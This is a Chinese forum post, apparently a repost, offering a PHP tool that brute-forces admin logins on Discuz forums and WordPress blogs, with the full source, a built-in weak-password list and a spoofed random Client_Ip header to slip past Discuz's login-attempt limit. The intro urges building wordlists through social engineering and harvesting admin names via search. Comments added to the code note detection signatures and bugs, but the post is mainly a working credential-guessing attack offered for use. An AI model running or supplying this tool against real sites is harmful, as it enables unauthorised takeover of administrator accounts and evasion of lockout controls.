当你觉得传统信息安全手段都用完了的时候,你是否想过还有暴力破解啊。现在一般的大型网站都是dz论坛跟wp博客,没有0DAY在手怎么办啊,你忘了一句话叫做不怕神一样的对手只怕猪一样的队友啊,结合非传统的社工工程学收集信息,制作字典,最后进行fuzz。没事写了个PHP版的fuzz,只写了dz跟wp的模块,有兴趣的朋友自己添加其他模块。有好的常用弱口令的同学麻烦在此帖共享下。另外没有写自动抓取dz管理员列表跟wp管理员列表的脚本,大家还是google一下你就知道吧,然后放在user.txt里面进行fuzz。下次一定补上这个功能。
以下是效果图:
<?php
// Usage guard: at least Host and Type are required on the command line.
// The encoding in $argv[3] is read unconditionally below even though the usage text
// shows it as optional, so a two-argument invocation raises an undefined-offset notice
// and $code ends up as an empty string.
if ($argc < 3) {
    print_r('
============================================================
author : Chora
example: ' . $argv[0] . ' Host dz (utf8)
example: ' . $argv[0] . ' Host dz gbk
example: ' . $argv[0] . ' Host wp gbk
example: ' . $argv[0] . ' Host Type Gbk/Utf8
============================================================
');
    die();
}
define("DZ", "/admin.php"); // Discuz admin login path, relative to the target host
define("WP", "/wp-login.php"); // WordPress login path
$host = $argv[1]; // target host; sent as the Host header and resolved with gethostbyname() in send()
$type = strtoupper($argv[2]); // 'DZ' or 'WP'; any other value is silently ignored by the dispatcher at the end of the file
$code = strtoupper($argv[3]); // 'GBK' makes encode() convert wordlist entries from UTF-8 to GBK; anything else keeps UTF-8
/**
 * Sends one hand-built HTTP/1.1 request to the global $host on port 80 (plain TCP, no TLS)
 * and returns the raw response text.
 *
 * @param string $url    request path (the DZ or WP constant)
 * @param string $post   url-encoded form body; a truthy value switches the method to POST
 *                       (truthiness, so a body of "0" would be sent as a GET)
 * @param string $cookie complete "Cookie: ..." header line, or '' to omit it
 * @param string $header unused
 * @param string $ip     value for a Client_Ip request header, or '' to omit it
 * @return string raw response (status line, headers and body); does not return if the
 *                connection fails, because die() aborts the whole script
 */
function send($url, $post, $cookie, $header, $ip)
{
    global $host; // assigned from $argv[1] at file scope
    $data = ($post ? "POST " : "GET ") . $url . " HTTP/1.1\r\n";
    $data .= "Host: $host\r\n";
    // Fixed, dated browser User-Agent: identical on every request, which makes it a
    // convenient fingerprint for server-side detection of this tool's traffic.
    $data .= "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\r\n";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= "Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
    // gzip is offered, so the body may come back compressed; match() only looks for the
    // status-line text, which is never compressed.
    $data .= "Accept-Encoding: gzip, deflate\r\n";
    $data .= $cookie ? $cookie . "\r\n" : "";
    // Client_Ip is an arbitrary client-supplied header. Any server-side throttling or
    // lockout keyed on such a header rather than on the TCP peer address is defeated by
    // it; the peer address in the web server's access log is the reliable attribution.
    $data .= $ip ? "Client_Ip: $ip\r\n" : "";
    $data .= $post ? "Content-Type: application/x-www-form-urlencoded\r\n" : "";
    // strlen() is byte-wise, which is what Content-Length needs for the url-encoded body.
    $data .= $post ? "Content-Length: " . strlen($post) . "\r\n" : "";
    $data .= "Connection: close\r\n\r\n"; // server closes after the response, so the feof() loop below terminates
    $data .= $post ? "$post\r\n\r\n" : "";
    $fp = fsockopen(gethostbyname($host), 80, $errno, $errstr); // port 80 is hard-coded; HTTPS-only hosts cannot be reached
    if ($fp) {
        fputs($fp, $data);
        while (!feof($fp)) {
            $html .= fread($fp, 8192); // $html is never initialised: the first append works on an undefined variable (notice)
        }
        fclose($fp);
        return $html;
    } else {
        die("Could not Connect to $host $errno:$errstr"); // terminates the script, not just this call
    }
}
/**
 * Success oracle: true when the raw response contains "302 Found" (case-insensitive),
 * anywhere in the text — the pattern is not anchored to the status line, so a "302 Found"
 * appearing in the body also counts. Both login pages are assumed to redirect on success;
 * any other redirect (for example to a lockout or captcha page) could therefore register
 * as a false positive.
 *
 * NOTE(review): `match` has been a reserved keyword since PHP 8.0, so this declaration is
 * a parse error on PHP >= 8 and the script only runs on PHP 7.4 and earlier. Renaming it
 * also requires changing the two call sites in crackdz() and crackwp().
 *
 * @param string $result raw response as returned by send()
 * @return int 1 on a match, 0 otherwise (preg_match's return value)
 */
function match($result)
{
    return preg_match('/302 Found/i', $result); // the keyword to look for can be customised here
}
/**
 * Builds a random dotted-quad IPv4 string, each octet drawn from rand(0, 255).
 *
 * The original author notes it is sent as the Client_Ip header so that Discuz's
 * login-attempt limit sees a different "client" on every request — which is exactly why
 * a login throttle must key on the transport peer address and never on a client-supplied
 * header.
 *
 * @return string e.g. "203.0.113.7" (constructed example)
 */
function ip()
{
    $octets = [];
    for ($i = 0; $i < 4; $i++) {
        $octets[] = rand(0, 255);
    }
    return implode('.', $octets);
}
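/**
 * Trims each wordlist entry and url-encodes it for use in a form body.
 *
 * @param iterable $arr  raw entries; lines read with file() still carry their newline, hence the trim()
 * @param string   $code 'GBK' converts each entry from UTF-8 to GBK via gbk() before encoding;
 *                       any other value leaves the bytes as they are
 * @return string[] re-indexed list of rawurlencode()d entries. Empty input yields an empty
 *                  list; the previous version returned null here because the accumulator
 *                  was never initialised, which made the callers' foreach emit a warning.
 */
function encode($arr, $code)
{
    $encode = []; // initialised so that an empty wordlist yields [] rather than null
    foreach ($arr as $value) {
        if ($code === 'GBK') {
            $value = gbk($value); // conversion first, then trim, as in the original order
        }
        $value = trim($value);
        $encode[] = rawurlencode($value);
    }
    return $encode;
}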
/**
 * Converts a UTF-8 string to GBK with iconv().
 *
 * Per the original author's note this exists for Discuz GBK installations, whose
 * administrator names may contain Chinese characters and must be submitted as GBK bytes.
 * Input that is not valid UTF-8 is not handled here; iconv() may then return false.
 *
 * @param string $string UTF-8 text
 * @return string|false GBK-encoded text, or false on conversion failure
 */
function gbk($string)
{
    $fromCharset = "UTF-8";
    $toCharset = "GBK";
    return iconv($fromCharset, $toCharset, $string);
}
/**
 * Splits an inline wordlist on CRLF and drops the first and last element (the empty
 * fragments produced by the leading and trailing line break of the quoted block).
 *
 * Assumes the source file itself uses CRLF line endings: with LF-only endings explode()
 * returns a single element, which is then discarded, and the list comes back empty.
 *
 * @param string $dic multi-line string literal, one entry per line
 * @return string[] re-indexed list of entries (untrimmed)
 */
function cut($dic)
{
    $lines = explode("\r\n", $dic);
    // array_slice with a negative length drops the last element and re-indexes,
    // matching array_shift() + array_pop() on the original.
    return array_slice($lines, 1, -1);
}
// Built-in usernames. The quoted block is parsed by cut(), which splits on CRLF, so the
// list is only populated when this source file is saved with CRLF line endings.
$user = "
admin
管理员
";
// Built-in passwords: the usual weak defaults a deployment check would reject; a
// password policy that blocks such values (and MFA on the admin login) makes this whole
// list useless against a site.
$pass = "
admin
123456
admin888
1234567
12345678
123456789
987654321
87654321
7654321
654321
555555
111111
666666
888888
88888888
000000
00000000
5201314
5211314
asdfgh
";
// Optional external wordlists, read from the current working directory:
// user.txt (usernames) and pass.txt (passwords). file() keeps the trailing newline on
// each line; encode() trims it later. The elseif below is just the negation of the if, so
// the two outer branches cover every case.
if (!file_exists('user.txt')) {
    if (file_exists('pass.txt')) {
        $user = cut($user);
        $pass = file('pass.txt');
    } else {
        $user = cut($user);
        $pass = cut($pass);
    }
} elseif (file_exists('user.txt')) {
    if (file_exists('pass.txt')) {
        $user = file('user.txt');
        $pass = file('pass.txt');
    } else {
        $user = file('user.txt');
        $pass = cut($pass);
    }
}
// Both lists are url-encoded once here (and GBK-converted when $code is 'GBK'), so the
// crack functions print url-encoded values unless they decode them again.
$user = encode($user, $code);
$pass = encode($pass, $code);
/**
 * Submits every username/password pair from the encoded global lists to the Discuz admin
 * login (DZ), prints each pair for which match() reports a 302, then exits the script.
 *
 * Review notes (detection / mitigation): every attempt is a separate POST to /admin.php
 * carrying a freshly randomised Client_Ip header from ip() and the fixed User-Agent set in
 * send(). A throttle or lockout keyed on the TCP peer address is unaffected by the spoofed
 * header, and the constant User-Agent plus the burst of POSTs to the admin path is a
 * straightforward log signature.
 *
 * Quirks visible in the code:
 *  - the username is printed rawurldecode()d but the password is printed still url-encoded
 *    (crackwp() prints both encoded);
 *  - $found is never initialised, so the "Not Found!" branch reads an undefined variable (notice);
 *  - exit() terminates the whole script, not just this function.
 */
function crackdz()
{
    global $user, $pass; // both already passed through encode()
    foreach ($user as $username) {
        foreach ($pass as $password) {
            $post = "admin_username=$username&admin_password=$password";
            $result = send(DZ, $post, '', '', ip()); // new random Client_Ip per attempt
            if (match($result)) {
                echo "Found[*] Username: " . rawurldecode($username) . " Password: $password\r\n";
                $found = 1;
            }
        }
    }
    if (!$found) {
        echo 'Not Found!';
    }
    exit();
}
/**
 * Submits every username/password pair from the encoded global lists to the WordPress
 * login (WP), prints each pair for which match() reports a 302, then exits the script.
 *
 * Review notes (detection / mitigation): unlike crackdz() no Client_Ip header is sent
 * (empty string), so every attempt arrives with the same peer address and the fixed
 * User-Agent from send(); per-address lockout on wp-login.php and the repeated POST
 * burst in the access log are the obvious controls and signature.
 *
 * Quirks visible in the code:
 *  - both username and password are printed url-encoded (crackdz() decodes the username);
 *  - $found is never initialised, so the "Not Found!" branch reads an undefined variable (notice);
 *  - exit() terminates the whole script, not just this function.
 */
function crackwp()
{
    global $user, $pass; // both already passed through encode()
    foreach ($user as $username) {
        foreach ($pass as $password) {
            $post = "log=$username&pwd=$password";
            $result = send(WP, $post, '', '', ''); // no cookie, no Client_Ip
            if (match($result)) {
                echo "Found[*] Username: $username Password: $password\r\n";
                $found = 1;
            }
        }
    }
    if (!$found) {
        echo 'Not Found!';
    }
    exit();
}
// Dispatch on the upper-cased Type argument. Any value other than 'DZ' or 'WP' matches
// no case, so the script ends silently without output.
switch ($type) {
    case 'DZ':
        crackdz();
        break;
    case 'WP':
        crackwp();
        break;
}
?>
转自:http://zone.wooyun.org/content/8760
转载于:https://blog.51cto.com/0daysec/1571495